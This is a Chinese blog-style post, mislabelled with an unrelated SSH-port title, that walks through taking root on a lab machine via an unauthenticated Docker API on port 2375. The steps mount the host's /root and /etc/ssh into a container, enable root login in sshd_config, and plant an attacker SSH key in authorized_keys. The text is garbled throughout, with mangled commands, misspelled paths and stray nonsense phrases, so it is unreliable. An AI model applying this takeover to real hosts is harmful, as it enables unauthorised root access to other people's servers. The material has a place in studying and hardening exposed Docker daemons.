首页 > 编程知识 正文

ssh修改端口后连不上(docker暴露多个端口)

时间:2023-05-06 01:56:55 阅读:68049 作者:3209

Docker2375端口非法get shell目标机: 192.168.196.133

使用条件: docker2375非法,有可启动的主机镜像

1、判断能否利用漏洞扫描端口发现开放端口22和2375

docker-htcp ://192.168.196.13:2375 PS可以成功执行docker命令

[ root @ localhost~] # docker-h 192.168.196.13:2375 imagesrepositorytagidcreatedsizeubuntulatestba6acccc edd 29

补充数据卷

数据卷是什么意思? 类似于我们Redis上的rdb和aof文件

真能干啊容器的持续化

容器之间的共享数据继承

特点:

1 :数据卷可以在容器之间共享或重用数据

2 )卷更改可以直接生效

3 )更改数据卷不包括在镜像更新中

4 )数据卷的生命周期持续到容器不再使用

使用直接命令添加

命令: docker run -it -v /宿主机绝对路径目录:/容器内目录镜像名称

可以用其他写法添加这里,但不太说明

2、docker-h 192.168.196.13:2375 run---RM-it---entry point bash-v/root 3360/tmp/root-v/etc/ssh 3360

点击这个命令后,我进入了一个叫ubuntu的容器中,试着看了一下ps

[ root @ localhost~] # docker-h 192.168.196.13:2375 pscontaineridimagecommandcreatedstatusportsnamese 5492 f 68345 dubuntu '

查一下容器中靶机的路线是否可以登录

我们一般都在看名为/etc/ssh/sshd_config的文件。 我们正好把他的目录映射到了我们的/tmp/ssh_etc下。 现在让我们看看/tmp/ssh_etc/sshd_config,看看Permitroottc。如果否,则更改为yes,以便root可以通过ssh登录

然后你攻击机器,在新形成的外壳中生成pubkey

[ root @ localhost~] # ssh-keygen-trsa-c ' l1nr ' generatingpublic/privatersakeypair.enterfileinwhichtosavethekey 333 3360 entersamepassphraseagain : youridentificationhasbeensavedinid _ RSA.yourpublickeyhasbeensavedinid _ RSA.pu the 333650 uhko9c4/km/legr 14 z24 ql1 nrthekey ' srandomartimageis :---[ RSA 2048 ]---| . ooo.|.oso . e.||o . o *|. o.||. o.||. o.o.|---- [ sha 256 ]----现在,在当前目录中确认两个生成

一个id_rsa个id_rsa.pub

然后返回容器,将我们的id_rsa.pub的内容写入名为/tmp/root/.shh/authorized_keys的文件中。 此文件与被攻击计算机上的/root/.shh/authorized_keys相同。 如果没有这个

完成这个步骤后,我们的攻击机可以利用我们的id_rsa文件直接连接到我们的目标机

ssh-I id _ RSA root @ 192.168.196.133连接时,请记住必须手动输入yes才能直接返回托架进行连接

版权声明:该文观点仅代表作者本人。处理文章:请发送邮件至 三1五14八八95#扣扣.com 举报,一经查实,本站将立刻删除。